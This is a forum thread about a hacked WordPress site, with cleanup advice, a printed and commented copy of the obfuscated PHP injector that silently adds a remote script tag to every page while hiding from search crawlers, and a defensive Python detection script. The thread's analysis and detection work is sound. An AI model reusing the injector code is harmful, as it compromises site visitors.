Wordpress Hosted Site Hacked?

Pho (Soldato, joined 18 Oct 2002, 9,324 posts, Derbyshire)
The base64 thing is a complete pain. I had it happen to someone's shop (they didn't have backups) and it infected hundreds of files.

Did you save the string before deleting it? If you can post it I can probably tell you which files it infected / was using for the infection.

Looks like you've cleared the redirect now though.
daz (Soldato, joined 18 Oct 2002, 24,073 posts, Bucks)
This type of attack is commonly seen when your FTP details have been leaked or sniffed. Change all of your passwords, and check any PCs you use for trojans/keyloggers/malware.
Pho (Soldato, joined 18 Oct 2002, 9,324 posts, Derbyshire)
Here you go:

Could this have infected any other files outside of Wordpress? Image files etc?

Would it be wise to change my FTP password and database information?

The hack I saw infected all .php files and probably more; check the contents of .htaccess to make sure it's not doing something in there too.

As above, it could have come from malware on your PC which is stealing FileZilla passwords. On the store I looked at it looked like it might have come from exploiting one of the admin files; make sure you use the latest version of Wordpress and keep it up to date.

Here's the "decrypted" code from above if you're interested; it's still obfuscated and somewhat of a pain to decrypt:

PHP:
// Runs once per request: the mr_no global is the injector's re-entry guard.
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])) {
	$GLOBALS['mr_no']=1;

	if(!function_exists('mrobh')) {

		// Returns the injected <script> tag (stored base64-encoded) for ordinary
		// visitors only; Googlebot and Yahoo crawlers get an empty string, which
		// hides the injection from search-engine malware checks.
		if(!function_exists('gml')) {
			function gml() {
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly93d3cua2Rqa2Zqc2tkZmpsc2tkamYuY29tL2pzLnBocCI+PC9zY3JpcHQ+");
				}
				return "";
			}
		}

		// Fallback gzip decoder for hosts without gzdecode(): walks the gzip header
		// flags (FEXTRA, FNAME, FCOMMENT, FHCRC) to find where the deflate stream
		// starts, so the callback below still works when the site gzips its output.
		if(!function_exists('gzdecode')) {

			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C) {

				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;

				if($R30B2AB8DC1496D06B230A71D8962AF5D&4) {
					$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
					$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
					$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&8) {
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&16) {
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&2) {
					$RBE4C4D037E939226F65812885A53DAD9+=2;
				}

				$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));

				// If the buffer was not gzipped, pass it through untouched.
				if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) {
					$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
				}

				return $R034AE2AB94F99CC81B389A1822DA3353;
			}
		}

		// Output-buffer callback: decompresses the buffered page, tells the browser
		// it is no longer encoded, then inserts the script tag just before </body>
		// (or appends it when the page has no closing body tag).
		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);

			if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {
				return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			} else {
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}

		// Registers the callback, so every page the site outputs passes through mrobh().
		ob_start('mrobh');
	}
}
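A small triage script for the pattern in that code, written for this thread and not part of the original post. It checks one PHP file's contents for the injector's markers (the mr_no global, the mrobh output-buffer callback, and the $R + 32-hex-digit variable names) and decodes any long base64 literal fed to base64_decode() so you can read what is being injected without executing the file; with hundreds of infected files you would run scan_php() over every .php file and .htaccess in the site. The two sample files and the injected.example domain are constructed.

```python
import base64
import binascii
import re

# Indicators taken from the injector posted above: its re-entry global, its
# ob_start() callback, its $R + 32-hex-digit variable names (the obfuscator's
# fingerprint), and any long base64 literal handed to base64_decode().
INDICATORS = {
    "mr_no_global":   re.compile(r"""\$GLOBALS\[['"]mr_no['"]\]"""),
    "ob_start_hook":  re.compile(r"""ob_start\(\s*['"]mrobh['"]\s*\)"""),
    "hex_named_var":  re.compile(r"\$R[0-9A-F]{32}\b"),
    "base64_literal": re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]{40,})['"]\s*\)"""),
}

def scan_php(source: str) -> dict:
    """Return {indicator_name: match_count} for one PHP file's contents."""
    return {name: len(rx.findall(source))
            for name, rx in INDICATORS.items() if rx.search(source)}

def decode_payloads(source: str) -> list:
    """Decode the base64 literals fed to base64_decode() so the injected HTML
    can be read without executing the file; invalid base64 is skipped."""
    decoded = []
    for literal in INDICATORS["base64_literal"].findall(source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded

def is_infected(source: str) -> bool:
    # The variable-name fingerprint alone, or any two other indicators, flags the file.
    hits = scan_php(source)
    return "hex_named_var" in hits or len(hits) >= 2

# Constructed sample (not from the thread): the same shape as the posted injector,
# with the placeholder domain injected.example in place of the real one.
_TAG = b'<script src="http://injected.example/js.php"></script>'
INFECTED_SAMPLE = (
    "<?php if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){"
    "$GLOBALS['mr_no']=1;function gml(){return base64_decode(\""
    + base64.b64encode(_TAG).decode() + "\");}"
    "function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){"
    "return $RE82EE9B121F709895EF54EBA7FA6B78B.gml();}ob_start('mrobh');} ?>"
)
CLEAN_SAMPLE = "<?php ob_start(); echo base64_decode('aGVsbG8='); ?>"
```

A clean file that merely calls ob_start() or decodes a short base64 string does not trip the check; only the injector's own names and a long encoded payload do.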

Pho (Soldato, joined 18 Oct 2002, 9,324 posts, Derbyshire)
That htaccess looks fine. Might be a good idea to look at scheduling backups of all the files in future just in case though.

You should be able to keep your database (but reset all passwords), especially if you have a lot of content.
Soldato (joined 9 May 2005, 4,524 posts, Nottingham)
Is it not just as likely to be a bug in Wordpress that caused the infection? Wordpress do release updates to fix exploits, but you still have to install them yourself.